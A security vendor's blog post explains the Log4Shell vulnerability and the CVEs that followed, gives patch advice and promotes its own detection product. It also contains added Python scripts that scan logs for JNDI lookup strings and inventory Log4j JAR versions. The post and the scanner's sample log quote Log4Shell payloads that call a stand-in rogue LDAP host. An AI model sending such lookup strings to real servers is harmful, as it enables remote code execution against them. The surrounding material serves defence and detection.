How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

  • The vulnerability CVE-2021-44228, also known as Log4Shell, was announced on December 10, 2021, and was rated a 10 (out of 10) on the Common Vulnerability Scoring System (CVSS) — a rating reserved for only the most severe vulnerabilities.
  • Following the announcement of CVE-2021-44228, CyCraft issued an emergency advisory to all CyCraft Customers outlining mitigation best practices. This advisory was updated as additional related vulnerabilities came to light.
  • Within hours, multiple attempts to exploit the vulnerability were observed in the wild by CyCraft and the wider intelligence community.
  • CyCraft leverages autonomous behavioral detection systems and human-AI collaboration to protect our customers.
  • CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested.
  • CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.
  • Organizations using Log4j2 are strongly encouraged to update the library to the latest Log4j2 version, currently version 2.17.0 at the time of this writing. Please see below for further mitigation best practices.

CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested. Our CyCraft MDR customers can monitor their internal network attack activities generated by attackers exploiting vulnerabilities as well as seek assistance from our AI analysts in inventorying which endpoints (Windows, Linux) or programs are at risk and assessing potential damage. CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.

Suggested Patches and Updates

Log4Shell Vulnerability Impact

Within days of the disclosure, attackers had performed countless scans hunting for vulnerable systems and servers around the globe. The affected component is the Java library Log4j, a logging and record-management framework developed and maintained by the Apache Software Foundation. Log4j is used in numerous commercial and open-source software products, so the scope and extent of the impact are massive.

“[Log4Shell] is the largest and most critical single vulnerability in the past decade, [and may even be] the largest vulnerability in the history of modern computers.”
Amit Yoran, CEO of the network security company Tenable

Scans observed and contained by CyCraft AIR.

Vulnerability CVE-2021-44228

CVE-2021-44228 can be exploited remotely by unauthenticated attackers to execute arbitrary code (Remote Code Execution, or RCE). For example, an attacker could send a message containing a Java Naming and Directory Interface (JNDI) lookup string, such as ${jndi:ldap://roguedapserver.com/a}; when the string is logged, Log4j resolves the lookup, allowing the attacker to execute malicious code on the host server. An attacker could likewise cause this string to be logged by a server through other, more subtle means, such as placing it in the User-Agent header while visiting a webpage or app, to achieve the same end result. Even websites and apps that do not directly accept user input are vulnerable to Log4Shell attacks, because the string only has to reach a logging call.

When the target server logs the request, the vulnerable Log4j version performs the JNDI lookup embedded in the logged string: it connects to the attacker-controlled LDAP (or similar) server named in the string and may then load malicious Java classes from it, so that the attacker can directly control the system.
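As an added example (not part of the original post), the following Python scanner flags access-log lines that carry a JNDI lookup like the one described above, percent-decoding each line first so URL-encoded copies are also matched. The log lines are constructed for the example; the hostname is the one quoted in the text.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the original post): a benign request, the
# lookup string quoted in the text, the same string URL-encoded, and one in User-Agent.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /${jndi:ldap://roguedapserver.com/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login?u=%24%7Bjndi%3Aldap%3A%2F%2Froguedapserver.com%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.12 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://roguedapserver.com/x}"
"""

# "${", optional whitespace, "jndi", ":" and the scheme that follows (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)
# A lookup nested inside another lookup is rare in legitimate requests; report it
# even when the literal "jndi" token is not visible after decoding.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")

def normalize(text):
    """Percent-decode repeatedly (bounded) so encoded lookups are matched too."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line):
    """Return a finding dict for one log line, or None if it looks clean."""
    decoded = normalize(line)
    m = JNDI_RE.search(decoded)
    if m:
        return {"verdict": "jndi-lookup", "scheme": m.group(1).lower(), "decoded": decoded != line}
    if NESTED_RE.search(decoded):
        return {"verdict": "nested-lookup", "scheme": None, "decoded": decoded != line}
    return None

def scan_log(text):
    """Scan a whole log; each finding carries its 1-based line number."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        finding = scan_line(line)
        if finding:
            finding["line"] = number
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['verdict']} scheme={f['scheme']} decoded={f['decoded']}")
```

Run it over real web-server or application logs to find the logged strings the text describes; a hit is a reason to check the host's Log4j version and outbound connections, not proof of compromise.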

Vulnerability CVE-2021-45046

After a busy week of updates, Log4j had been upgraded to version 2.15. Although it patched CVE-2021-44228, industry intelligence reports revealed that the version 2.15 patch could be bypassed** in certain non-default configurations where JNDI lookup is turned on. Hence, the CVSS rating of CVE-2021-45046 was raised from 3.7 to 9.0, reclassifying it from a DoS vulnerability to RCE.

**This bypass uses an SSRF bypass technique introduced in this Black Hat talk.

Vulnerability CVE-2021-45105

A DoS issue was subsequently found in Log4j 2.16 (CVE-2021-45105). Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect against uncontrolled recursion from self-referential lookups, allowing attackers with control over Thread Context Map data to cause a DoS. This issue was fixed in Log4j 2.17.0 and 2.12.3.

How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

CyCraft AIR hunts malicious behavior and the known tactics and techniques of active and emerging threats rather than relying on block/allow signature-based lists or specific exploits. CyCraft AIR uniquely provides 24/7/365 coverage across your entire network via autonomous systems and human-AI collaboration.

CyCraft AI analysts leverage machine learning to detect, validate, and contain both known and unknown malware and threats. The CyCraft AIR sensor scans endpoints within your local network and in the cloud across Windows, Linux, and macOS environments. In addition to having already successfully detected and prevented attacks exploiting the Log4j2 vulnerability, CyCraft AIR has also proven to be highly effective in protecting both large and small organizations against advanced ransomware, cryptomining malware, Trojans, and botnets.

Above, CyCraft AIR successfully detected, validated, and contained malicious activity exploiting the Log4Shell vulnerability; thus preventing further malicious activity occurring on both the targeted endpoint and system. With each successful detection, validation, and containment, CyCraft AIR enhances its existing detection and response capabilities, providing the CyCraft Community at large with more effective and efficient coverage.

Inventorying Log4j
Most asset inventory systems do not support JAR analysis, so it is difficult to inventory Log4j versions on a large scale.

JAR inventory is extremely difficult for current IT teams because traditional software inventory tools enumerate components or system packages installed through installers such as MSI. JAR files, however, are Java application-level packages rather than formally registered system components, so asset software cannot analyze them. To support a software bill of materials (SBOM), CyCraft MDR can analyze the Java processes on a system and accurately assist customers in inventorying internal Log4j versions as well as more accurately calculating the potential impact:
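As an added example (not CyCraft's tool), the following Python script shows the kind of JAR analysis the paragraph describes: it reads the version from the log4j-core pom.properties entry, checks whether the JndiLookup class is present, and recurses into JARs nested inside fat JARs or WARs. The update threshold follows the post's advice (2.17.0, or 2.12.3 on the 2.12 branch); build_jar constructs stand-in archives so the script runs offline.

```python
import io
import re
import zipfile
from typing import Dict, List, Optional

# The pom.properties entry Maven embeds in log4j-core, and the class behind the JNDI lookup.
POM_RE = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def needs_update(version: str) -> bool:
    """True unless 2.17.0+ or a fixed 2.12.x (2.12.3+); unparsable versions are flagged."""
    v = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return not (v >= (2, 17, 0) or (v[:2] == (2, 12) and v >= (2, 12, 3)))

def inspect_jar(name: str, data: bytes) -> List[Dict[str, object]]:
    """Find log4j-core inside a JAR, recursing into nested JAR/WAR entries (fat jars)."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        names = jar.namelist()
        pom = next((n for n in names if POM_RE.search(n)), None)
        if pom:
            props = jar.read(pom).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = m.group(1).strip() if m else "unknown"
            findings.append({"jar": name, "version": version,
                             "jndi_lookup": JNDI_CLASS in names,
                             "needs_update": needs_update(version)})
        for inner in names:
            if inner.lower().endswith((".jar", ".war", ".ear")):
                findings.extend(inspect_jar(f"{name}!{inner}", jar.read(inner)))
    return findings

def build_jar(version: Optional[str], with_jndi: bool,
              nested: Optional[Dict[str, bytes]] = None) -> bytes:
    """Constructed stand-in for a real JAR holding only the entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        if version:
            z.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                       f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
        for inner_name, inner_bytes in (nested or {}).items():
            z.writestr(inner_name, inner_bytes)
    return buf.getvalue()

if __name__ == "__main__":
    fat = build_jar(None, False, {"BOOT-INF/lib/log4j-core-2.14.1.jar": build_jar("2.14.1", True)})
    for finding in inspect_jar("app.jar", fat) + inspect_jar("log4j-core-2.17.0.jar", build_jar("2.17.0", True)):
        print(finding)
```

On a real host, feed inspect_jar the JAR paths taken from each running Java process's classpath, since a JAR shaded into an application archive will not appear in any package-manager inventory.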

CyCraft Customers can prevent cyber intrusions from escalating into business-altering incidents. From endpoint to network, from investigation to blocking, from in-house to cloud, CyCraft AIR covers all aspects required to provide small, medium, and large organizations with the proactive, intelligent, and adaptable security solutions needed to defend from all manner of both existing and emerging security threats with real-time protection and visibility across the organization.

Whether it’s on Windows, Linux, or macOS, CyCraft AIR leverages autonomous behavioral detection systems and human-AI collaboration to protect the CyCraft Community from both known active threats and unknown emerging threats.

Writer: CyCraft

About CyCraft

CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.
